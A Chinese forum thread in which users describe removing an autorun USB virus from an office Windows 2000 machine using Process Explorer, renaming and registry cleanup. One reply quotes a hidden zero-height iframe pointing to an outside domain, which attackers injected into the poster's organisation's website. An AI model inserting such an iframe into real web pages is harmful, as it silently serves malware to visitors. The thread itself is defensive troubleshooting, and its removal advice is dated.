今天主任的电脑终于中毒了！症状和前几天随机8位病毒差不多，但是用winrar查看目录文件，发现winrar一闪而过。隐藏文件选项被修改，最后改注册表回来看，病毒文件是：autorun.ini和ibvtcgv.exe. 一数是7位，先按原先的操作做，发现不行。心想winrar不行了，怎么用改名大法呢？我把所有系统安全工具都改名试过了，发现autoruns.exe可以用，也发现好多好多的映像劫持。大名鼎鼎的SREng  icesword 卡卡安全助手均无效，USBCleaner.exe可以用但不治本。查询资料中发现2个好东西，都是在论坛里面发布有的，确实好用，有效！一是ProcessExplorer 二是凝逸反毒nyfd5.6.3(http://nyfd.n-cn.com/download/nyfd.zipfd) 推荐的凝逸反毒一键清不行，被禁用了。
方法：先解压使用ProcessExplorer 在explorer.exe下会有2个病毒文件ehjalrp.exe和quqnrtl.exe鼠标移上去会显示其路径在c:\program files\common files\microsoft shared\ 和c:\program files\common files\system\(好像是)现在找到位置了就用凝逸反毒的资源管理器（很有特色）把两个病毒改名，删除不行，会重生。马上复位重启，现在病毒进程不在了，用autoruns.exe把该死的映像劫持删除。保险起见查找注册表中ehjalrp.exe和quqnrtl.exe予以删除。现在你的卡卡啊icesword又有用武之地了！还有个东西，在c:\program files\meex.exe  是病毒把它删除。我现在把瑞星重装了，正疯狂杀毒中，弄了我半天。
这是我第一次发表杀毒经历，主要是网上没有找到这个病毒的查杀方法。有个说xp系统下 命令行手工清楚的，对于win2000我没有采用，我这个方法可能不是最好希望有高手指教，造福广大群众。

遗憾没有 不过据说是从这个网站上来的，最近我们网站着挂马勒，挂马的网页我还留的有。给我加了这个代码"<iframe src=http://w.mh8888.cn/ad.htm?m width=100 height=0 frameborder=0></iframe>"就是这个网址,败坏我们单位名声.

哦 受教 其实这招就跟病毒用的的手法差不多，借userinit.exe 启动IceSword.exe 不过今天我试图把IceSword120_cn.zip解压被提示说出错,解压不成功,文件夹里面一片空白.压缩包里面的IceSword.exe倒是没有改名.先改名过去可能会有效.

要样本,看明天找的到不,记得一个同事的移动硬盘中毒时还插在电脑上,里面应该有样本.是把几个病毒文件复制了压缩发给你么?

刚刚上网搜索ehjalrp.exe又找到几个中毒者的纪录了。下一个版本就禁用注册表？现在的病毒制作者都想把自己的毒做得朝毒王方向发展。悲哀啊！！主任电脑就在我旁边，用的诺顿，可能很久没有升级了，这下中毒后刚刚查处病毒600来个，汗...

不好意思，同事带病毒回家瑞星监控把它杀了，没有样本了，6月几号的瑞星应该可以杀得了